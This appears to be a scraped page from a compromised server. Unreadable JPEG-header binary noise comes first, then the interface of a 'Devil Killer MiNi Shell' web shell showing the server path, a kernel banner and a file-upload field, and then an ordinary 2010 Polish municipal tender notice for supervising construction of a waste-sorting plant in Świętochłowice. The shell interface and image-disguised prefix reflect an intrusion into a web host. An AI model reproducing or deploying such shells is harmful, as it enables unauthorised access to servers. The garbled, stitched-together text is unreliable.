JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100803/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100803/236286-N-2010.html

<p class="kh_header"><b>Świętochłowice: Pełnienie obowiązków inspektora nadzoru inwestorskiego dla realizacji zadania pn. Budowa linii do segregacji odpadów komunalnych wraz z infrastrukturą towarzyszącą na składowisku odpadów komunalnych w Świętochłowicach</b><br>
<b>Numer ogłoszenia: 236286 - 2010; data zamieszczenia: 03.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Świętochłowice reprezentowana przez Prezydenta Miasta Świętochłowice , ul. Katowicka 54, 41-600 Świętochłowice, woj. śląskie, tel. 032 2453031, 6527500, faks 032 2454976,3491812.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.swietochlowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie obowiązków inspektora nadzoru inwestorskiego dla realizacji zadania pn. Budowa linii do segregacji odpadów komunalnych wraz z infrastrukturą towarzyszącą na składowisku odpadów komunalnych w Świętochłowicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamiarem Zamawiającego jest, aby Wykonawca - Inspektor Nadzoru Inwestorskiego działał przy realizacji inwestycji w jego imieniu.
Przedmiotem niniejszego zamówienia są usługi w zakresie:
Pełnienie obowiązków inspektora nadzoru inwestorskiego nad realizacją zadania pn
 Budowa linii do segregacji odpadów komunalnych wraz z infrastrukturą towarzyszącą na składowisku odpadów komunalnych w Świętochłowicach 

Projekt posiada dofinansowane ze środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013, priorytet V Środowisko, działanie 5.2. Gospodarka odpadami stanowiącego program operacyjny Europejskiego Funduszu Rozwoju Regionalnego. 

Inwestycja dla której będzie prowadzony nadzór swoim zakresem obejmuje budowę sortowni odpadów komunalnych z kontenerowym budynkiem socjalno-sanitarnym wraz z infrastrukturą towarzyszącą na terenie Składowiska odpadów komunalnych przy ul. Wojska Polskiego w Świętochłowicach, tj.:
Sortownia zmieszanych odpadów komunalnych  o wydajności 30.000 Mg / rok / 1 zmianę.
Część technologiczna - układ:
	przenośnik kanałowy - załadowczy,
	przenośnik wznoszący,
	sito bębnowe (dwusekcyjne),
	przenośnik wznoszący
	trybuna sortownicza wraz z kabiną sortowniczą,
	separator elektromagnetyczny wraz z konstrukcją nośną,
	przenośnik przesyłowy - rewersyjny (końcowy)
Linia do surowców wtórnych:
	przenośnik kanałowy - załadowczy (do kabiny sortowniczej),
	przenośnik załadowczo wznoszący do prasy,
	prasa belująca z perforatorem.
Część konstrukcyjno - budowlana hali sortowni:
	budynek sortowni zaprojektowano w konstrukcji stalowej jako jednonawowy, jednokondygnacyjny o rozpiętości:
	62,20 m x 21,40 m = 1.331,08 m2;
	kubatura hali wynosi ok. 12.645,3 m3;
	średnia wysokość hali ok. 9,5 m.
	wentylacja hali:
	dla budynku sortowni odpadów zaprojektowano wentylację mechaniczną wywiewną oraz nawiewną podciśnieniową.
	budynek socjalny:
	system zabudowy modułowej.
Część instalacyjna:
	instalacje wod-kan:
	sieć wodociągowa,
	sieć kanalizacji deszczowej,
	sieć kanalizacji sanitarnej.
	instalacje elektryczne:
	zasilanie,
	oświetlenie zewnętrzne.
Część drogowa:
	drogi dojazdowe i place manewrowe do obsługi obiektów sortowni odpadów.
Dostawa pojazdów, maszyn i urządzeń.

Przedmiot niniejszego zamówienia obejmuje:
1)	Zapoznanie się z dokumentacją projektową przedmiotowej inwestycji, będącą w posiadaniu Zamawiającego, w celu sprawdzenia wzajemnej zgodności i kompletności poszczególnych elementów składających się na tę dokumentację, w tym:
	zweryfikowanie dokumentacji projektowej pod względem jej kompletności i zgodności z przepisami prawa budowlanego, posiadanymi przez Zamawiającego decyzjami, opiniami  i uzgodnieniami,
	przeprowadzenie inspekcji terenu budowy w celu sprawdzenia zgodności stanu istniejącego z dokumentacją projektową,
	wskazanie ewentualnych błędów Zamawiającemu w dostarczonej dokumentacji oraz interpretacja wpływu błędu na projekt i zaproponowanie Zamawiającemu konkretnych zmian (rozwiązań),
	opracowanie i przedłożenie Zamawiającemu w terminie 20 dni od daty podpisania umowy na realizację niniejszego zamówienia, harmonogramu wykonania planowanych robót na podstawie badanych dokumentów.
2)	Pełnienie funkcji pomocy technicznej i merytorycznej dla przetargów prowadzonych w ramach realizowanej inwestycji, w tym:
	stała pomoc Zamawiającemu w zakresie opracowywania, zgodnie z ustawą z dnia 29 stycznia 2004r. Prawo zamówień publicznych (tekst jedn. Dz. U. z 2010, Nr 113, poz.759. dalej: PZP) kompletnych dokumentacji przetargowych (Specyfikacji Istotnych Warunków Zamówienia oraz Ogłoszeń o zamówieniach) związanych z realizacja przedmiotowej inwestycji. Szczegółowy zakres opisu przedmiotu zamówienia określa Rozporządzenie Ministra Infrastruktury z dnia 2 września 2004 r. (Dz. U. Nr 202, poz. 2072) w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego.
	przygotowanie odpowiedzi na zapytania wykonawców biorących udział w postępowaniach przetargowych, we współpracy z Zamawiającym
	pomoc dla komisji przetargowej na etapie oceny ofert w szczególności poprzez zapewnienie udziału odpowiednio przygotowanych konsultantów,
	pomoc przy rozstrzyganiu przez Zamawiającego sporów w szczególności poprzez przygotowywanie propozycji odpowiedzi na odwołania, na informacje o niezgodnej z przepisami ustawy czynności podjętej przez Zamawiającego  i  skargi na wyroki KIO,
	udział w dodatkowych postępowaniach przetargowych związanych z ewentualnym powtarzaniem postępowań o udzielenie zamówień publicznych na zadania związane z realizacją inwestycji. W cenie ofertowej należy uwzględnić ewentualne koszty z tytułu powtarzania postępowań o udzielenie zamówień publicznych.
3)	Pełnienie funkcji inspektora nadzoru inwestorskiego zgodnie z art. 25 i 26 polskiego Prawa Budowlanego, z uwzględnieniem terminów i zgodnie ze sztuką budowlaną, tak, aby zapewnić jak najlepsze wykonanie realizowanych robót, a w szczególności:
	reprezentować Zamawiającego na terenie budowy poprzez sprawowanie kontroli zgodności wykonanych robót z dokumentacją projektową, pozwoleniem na budowę, decyzjami, opiniami   i uzgodnieniami, przepisami obowiązującego prawa i normami oraz z zasadami wiedzy technicznej,
	powiadamiać organ nadzoru budowlanego o terminie rozpoczęcia robot, 
	przekazywać wykonawcom robót, w imieniu Zamawiającego, projekty budowlane, pozwolenia na budowę i prawo dostępu do terenu budowy w terminach określonych w harmonogramie prowadzenia robót,
	inicjować i prowadzić rady techniczne na terenie budowy odbywające się w każdy pierwszy dzień tygodnia lub w innym uzgodnionym terminie oraz prowadzić rejestr rad technicznych, sporządzać raporty z rad technicznych i przekazywać kopie raportów uczestnikom rad technicznych i Zamawiającemu;
	współdziałać z autorem dokumentacji projektowej w zakresie sprawowanego przez niego nadzoru autorskiego i uzyskiwać od Projektanta zgody na zmiany w zakresie projektu budowlanego.
	przyjmować od wykonawców robót powiadomienia o stwierdzeniu błędów w Specyfikacjach technicznych wykonania i odbioru robót, i po ich zbadaniu, przekazywać je Zamawiającemu wraz z rekomendacją sposobu rozwiązania problemu,
	uczestniczyć w kontrolowaniu  jakość robót, wbudowanych w nie materiałów i urządzeń i zapobiegać użyciu wadliwych lub niedopuszczonych do obrotu i stosowania w budownictwie; 
	uczestniczyć w sprawdzaniu  i odbiorze  robót ulegających zakryciu lub zanikające, uczestniczyć odbiorach robót j.w. oraz brać udział w przejmowaniu gotowych obiektów i w przekazywaniu ich do użytkowania; Brać udział w potwierdzaniu ilości wykonanych robót;
	w przypadku stwierdzenia wad nadzorować wspólnie z Zamawiającym ich usunięcie;
	wydawać kierownikowi budowy lub kierownikowi robót polecenia (potwierdzone wpisem do dziennika budowy) dotyczące: wykonywania robót, usunięcia nieprawidłowości i zagrożeń, przeprowadzania prób lub badań (także wymagających odkrycia robót zakrytych zanikowych), przedstawienia ekspertyz dotyczących robót
	za zgodą Zamawiającego wstrzymać roboty w przypadku, gdyby ich kontynuacja mogła wywołać zagrożenie życia lub zdrowia ludzi bądź spowodować znaczne straty materialne; 
	przygotowywać  dla Zamawiającego stosowne świadectwa przejęcia i protokoły odbiorów;
	przekazywać Zamawiającemu stosowne świadectwa wykonania i weryfikować rozliczenia (oświadczenia) końcowe przedkładane przez wykonawców robót;
	koordynować działania wykonawców robót i pomagać im uzyskać wymagane uzgodnienia i pozwolenia na użytkowanie robót w imieniu Zamawiającego;
	w przypadku wystąpienia sytuacji nieprzewidzianych lub siły wyższej, przeprowadzić analizę sytuacji i doradzić Zamawiającemu rozwiązanie problemu i/lub zatwierdzić plan działania wykonawcy robót przedstawiony na taką okoliczność;
	analizować, weryfikować i zatwierdzać zmiany do harmonogramu wykonania robót w porozumieniu z Zamawiającym i z wykonawcą robót, w celu optymalizacji kosztów i terminu wykonania (czasu na ukończenie); 
	przeciwdziałać wszelkim opóźnieniom i nieprawidłowościom zaistniałym na terenie budowy podczas wykonywania robót;
	monitorować i analizować postęp robót;
doradzać Zamawiającemu w zakresie obniżenia kosztów budowy, a także kosztów eksploatacyjnych w przyszłości;
sprawować nadzór w zakresie dostępności, mobilizacji i wykorzystania sprzętu Wykonawcy stosownie do postanowień SIWZ na wykonanie robót;
	kontrolować terminy obowiązywania wszystkich certyfikatów, aprobat, polis ubezpieczeniowych, gwarancji lub poręczeń (zabezpieczenia należytego wykonania robót), własności sprzętu Wykonawcy, itp., za które wykonawcy robót są odpowiedzialni zgodnie z postanowieniami SIWZ;
	przeprowadzać regularne kontrole w celu weryfikacji jakości stosowanych materiałów i urządzeń oraz wykonywanych robót oraz stwierdzać ich zgodność z polskimi normami, aprobatami technicznymi lub deklaracjami zgodności oraz  zgodnie z sztuką budowlaną;
	analizować i oceniać kompletność sporządzanych przez wykonawców robót instrukcji obsługi, eksploatacji, konserwacji oraz dokumentacji techniczno-ruchowych; 
	brać czynny udział i nadzorować próby końcowe (w tym próby przedrozruchowe, próby rozruchowe  i ruch próbny) i próby eksploatacyjne;
	kontrolować przeprowadzania prób i uznawać świadectwa wystawione przez wykonawców robót;
	przygotować końcową inspekcję i sporządzić protokół odbioru końcowego robót oraz inne dokumenty niewymienione w SIWZ na wykonanie robót, a mające zastosowanie w procesie inwestycyjnym;
	nadzorować terminowe wykonanie robót; rekomendować Zamawiającemu propozycje stosownych zmian w przypadku zaistnienia okoliczności uzasadniających zmiany harmonogramu robót;
	kontrolować przeprowadzane obmiary wykonanych robót 
	przeprowadzić procedurę uzyskania pozwolenia na użytkowanie realizowanej inwestycji zgodnie  z zapisami w decyzji o pozwoleniu na budowę;
	przyjmować, analizować, weryfikować i zatwierdzać dokumentację powykonawczą i inne dokumenty związane z zakończeniem robót, sporządzone przez wykonawców robót,
	kontrolować przestrzeganie przez wykonawcę robót zasad BHP oraz utrzymania porządku na terenie budowy;
	zachować wymagania ochrony środowiska;
	sporządzać wszelkie niezbędne dokumenty stosownie do postanowień do wymagań Zamawiającego i/lub instytucji finansujących projekt;
	doradzać fachowo i świadczyć stałe usługi konsultacyjne dla Zamawiającego.


4) Raporty:

Wykonawca niniejszego zamówienia sporządza raporty w czasie trwania Umowy na realizację niniejszego projektu w zakresie i terminach określonych poniżej.
1.	Raport otwarcia.
W okresie miesiąca od daty rozpoczęcia realizacji niniejszego zamówienia przedstawiciel Wykonawcy niniejszego zadania przedłoży Zamawiającemu Raport Otwarcia zawierający komentarz dotyczący ogólnej organizacji inwestycji, listę trudności jakie wynikły w początkowym okresie realizacji inwestycji, zidentyfikuje ryzyka i potencjalne problemy, które mogą wystąpić podczas realizacji inwestycji                       i zaproponuje sposoby ich rozwiązania. Ponadto raport będzie zawierał sprawozdanie ze sprawdzenia dokumentacji projektowej, jej kompletności i wzajemnej zgodności.
2.	Raporty miesięczne.
Przedstawiciel Wykonawcy niniejszego zadania przez cały okres realizacji inwestycji sporządza raporty miesięczne. Raport będzie zawierał:
	opis postępu robót i powstałych problemów, propozycje rozwiązania tych problemów,
	zaangażowanie sił i środków Wykonawcy robót,
	zaangażowanie finansowe,
	postęp robót i płatności w powiązaniu z planem na każdy miesiąc,
	plan robót i płatności na kolejny miesiąc,
	graficzne przedstawienie postępu robót w powiązaniu z harmonogramem,
	graficzna prezentacja postępu robót na planie i lub rysunkach obiektów,
	fotografie dokumentujące postęp robót,
	lista poleceń zmian z wartością odnośnych robót oraz wartością netto polecenia zmian,
	aktualne szacunki kosztu końcowego na różnych etapach wdrażania i trwania inwestycji,
	wykaz roszczeń i etap ich rozpatrzenia.
3.	Raport techniczny.
Przedstawiciel Wykonawcy niniejszego zadania przygotuje (wtedy, kiedy to konieczne lub na żądanie Zamawiającego) raport informujący o problemach technicznych jakie wystąpiły w trakcie realizacji robót. Taki raport będzie wymagany, kiedy wystąpią poważne zmiany w dokumentacji projektowej.
Raport techniczny powinien zawierać:
	założenia, na podstawie których została opracowana dokumentacja projektowa,
	zestawienie wszystkich nowych założeń projektowych konieczne do oceny zaproponowanej zmiany,
	zestawienie rysunków powykonawczych pokazujących lokalizację i szczegółowe wymiary wszystkich wykonanych robót do dnia sporządzenia raportu,
	kopie wszystkich wcześniej zatwierdzonych zmian projektowych i innych zmian,
	kopie kalkulacji cen jednostkowych z oferty Wykonawcy robót, które będą występowały w związku              z wprowadzaną zmianą,
        opis przyjętych projektowych założeń i różnice w założeniach projektowych w stosunku do oryginalnych, ofertowych rozwiązań,
	nowy przedmiar pozycji kosztorysowych i koszty odpowiadające proponowanym zmianom projektowym w porównaniu z ofertą Wykonawcy robót,
	rysunki pokazujące dokładną lokalizację proponowanych zmian projektowych.

4.	Raport dotyczący sporu.

Wykonawca przedłoży Zamawiającemu raport dotyczący sporu w każdym przypadku, gdy w trakcie realizacji usługi zostanie wszczęty spór między Zamawiającym a Wykonawcą robót dotyczący realizacji inwestycji, a także wraz ze sporządzeniem protokołu odbioru końcowego dla wszystkich spraw spornych, jakie wystąpiły w trakcie realizacji, w których Wykonawca robót co prawda nie wszczął sporu sądowego, ale nie zgodził się ze stanowiskiem Inspektora Nadzoru Inwestorskiego i Zamawiającego. Każdy Raport dotyczący sporu zawierał będzie szczegółowy opis zdarzeń i korespondencji dotyczącej sporu (wraz             z kalendarium). Do Raportu powinny być załączone wszelkie istotne dokumenty, które pozwolą na przeanalizowanie przebiegu sporu i stanowisk stron. Jeśli nie będzie wynikało to z korespondencji, Wykonawca będzie zobowiązany do zawarcia w Raporcie swego wyraźnego i jednoznacznego stanowiska co do przedmiotu sporu oraz uzasadnienia dla podejmowanych w związku ze sporem rozstrzygnięć.
5.	Raport końcowy.
Po zakończeniu robót, wystawieniu protokołu odbioru końcowego, Wykonawca przedłoży Zamawiającemu Raport końcowy zawierający:
1.	Wstęp
	Krótki opis projektu.
	Działania przed rozpoczęciem inwestycji.
2.	Dokumentacja projektowa.
	Założenia projektowe.
	Zmiany projektowe w trakcie realizacji.
3.	Organizacja i zarządzanie inwestycją.
	Struktura zarządzania Wykonawcy.
	Struktura Nadzoru Inwestorskiego.
4.	Wykonawstwo.
	Postęp robót.
	Uwagi do wykonania poszczególnych głównych elementów robót.  
	Odpowiednie pozycje głównych elementów robót wg Specyfikacji.
	Osiągnięta jakość robót w zgodności ze Specyfikacjami Technicznymi.
	Przyczyny wystąpienia wad.
5.	Sprawy umowy o roboty budowlane i zmiany.
	Czas trwania umowy o roboty budowlane.
	Roszczenia.
6.	Sprawy finansowe.
	Przyczyny zmiany zaakceptowanej kwoty, na którą opiewała umowa.
	Końcowe rozliczenie ilościowe wykonanych robót.
7.	Uwagi i wnioski z przebiegu realizacji inwestycji dotyczące:
	Dokumentacji projektowej.
	Umowy na roboty.
	Ogólnych i Szczegółowych Specyfikacji Technicznych.
	Czasu trwania umowy o roboty budowlane.
	Technologii robót.
	Rekomendacji na przyszłe, podobne projekty.
Każdy z powyższych raportów należy sporządzić w co najmniej 2 egzemplarzach i przekazać Zamawiającemu.


W ramach wykonywanych czynności, związanych z realizacją przedmiotowej inwestycji Zamawiający zapewnia:
przekazanie kompletnej dokumentacji projektowej realizowanej inwestycji wraz z uzyskanymi decyzjami, postanowieniami i opiniami,
udostępnienie Wykonawcy pomieszczenia biurowego z dostępem do wody, energii elektrycznej, łącza internetowego, zlokalizowanego w pobliżu terenu budowy, w budynku socjalnym stanowiącym zaplecze składowiska odpadów w Świętochłowicach, na podstawie porozumienia z zarządcą składowiska,
wyznaczenie inspektora nadzoru autorskiego, którym jest firma HEKO z siedzibą w Poznaniu przy ul. Miodowej 2a/2, będąca wykonawcą dokumentacji projektowej realizowanej inwestycji,.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1, 71.24.80.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.01.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od Wykonawców wniesienia wadium w wysokości 8 000 zł,-PLN (słownie:osiem tysięcy złotych) zabezpieczającego ofertę na okres 30 dni</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania przez wykonawcę spełnienia warunków w zakresie posiadania wiedzy i doświadczenia Wykonawca przedstawi: 
w zakresie branży konstrukcyjno-budowlanej nadzór nad co najmniej 1 instalacji z zakresu gospodarowania odpadami,  o wartości min. 5.000.000,00 zł brutto;
w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych nadzór nad co najmniej 1 inwestycją o wartości min. 200.000,00 zł brutto;
w zakresie sieci, instalacji i urządzeń wentylacyjnych nadzór nad co najmniej 1 inwestycją o wartości min. 70.000,00 zł brutto;
w zakresie branży sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych nadzór nad co najmniej 1 inwestycją o wartości min. 400.000,00 zł brutto;
wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia z podaniem ich wartości, przedmiotu,  dat wykonania  i odbiorców oraz dokumenty, potwierdzające, że usługi te zostały wykonane należycie;
Wykonawca może wykazać usługę, która równocześnie spełni dwa lub więcej z w/w warunków.
Zamawiający oceni spełnienie przez Wykonawcę warunków udziału w postępowaniu stwierdzeniem: spełnia  lub nie spełnia, w oparciu o wymagane dokumenty i zawarte w nich informacje.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania przez Wykonawcę spełnienia warunków w zakresie dysponowania osobami i podmiotami Wykonawca przedstawi: wykaz osób i podmiotów, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności oraz informacja o podstawie dysponowania tymi osobami;
Zamawiający wymaga, aby osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadały następujące kwalifikacje zawodowe, doświadczenie i wykształcenie oraz zakres wykonywanych czynności:

1. 1 osobę na stanowisko Inspektora nadzoru w branży konstrukcyjno-budowlanej, posiadającego: 
Wykształcenie wyższe techniczne, 
Kwalifikacje zawodowe: uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej zgodnie z polskim Prawem Budowlanym, bez ograniczeń lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz członkostwo  właściwej izby samorządu zawodowego,
Doświadczenie: Minimum 10-letnie doświadczenie zawodowe w kierowaniu lub nadzorowaniu robót budowlanych, 

2.  co najmniej 1 osobę  na stanowisko Inspektora nadzoru w branży sieci, instalacji i urządzeń: wodociągowych i kanalizacyjnych, cieplnych, wentylacyjnych i gazowych,  posiadającego:
Wykształcenie techniczne, 
Kwalifikacje zawodowe: Uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych zgodnie z polskim Prawem Budowlanym bez ograniczeń lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz członkostwo  właściwej izby samorządu zawodowego,
Doświadczenie:
Minimum 10-letnie doświadczenie zawodowe w wykonawstwie lub nadzorze lub kierowaniu robotami budowlanymi w zakresie sieci, instalacji i urządzeń cieplnych, gazowych, wentylacyjnych, wodociągowych i kanalizacyjnych, 

3. co najmniej 1 osobę  na stanowisko Inspektora nadzoru w branży sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, posiadającego:
Wykształcenie techniczne, 
Kwalifikacje zawodowe: Uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych zgodnie z polskim Prawem Budowlanym bez ograniczeń lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz członkostwo właściwej izby samorządu zawodowego,
Doświadczenie:
Minimum 10-letnie doświadczenie zawodowe w wykonawstwie lub nadzorze lub kierowaniu robotami budowlanymi  w zakresie sieci, instalacji i urządzeń elektrycznych, 

4. co najmniej 1 osobę  na stanowisko Inspektora nadzoru w branży drogowej, posiadającego: 
Wykształcenie techniczne,
Kwalifikacje zawodowe: Uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie do kierowania robotami w specjalności drogowej zgodnie z polskim Prawem Budowlanym bez ograniczeń lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz członkostwo  właściwej izby samorządu zawodowego,

Doświadczenie:
Minimum 10-letnie doświadczenie zawodowe w wykonawstwie lub nadzorze lub  kierowaniu robotami budowlanymi w zakresie branży drogowej. 

Przedstawiona lista specjalistów może nie być wyczerpująca i może zostać uzupełniona przez Wykonawcę, w celu rzetelnego i niezawodnego wypełnienia jego zobowiązań. Lista ta powinna być traktowana jako minimalne wymagania Zamawiającego.
Zamawiający dopuszcza łączenie funkcji inspektorów poszczególnych branż wymienionych powyżej, pod warunkiem wykazania się niezbędnymi uprawnieniami i doświadczeniem dla każdej z branż.
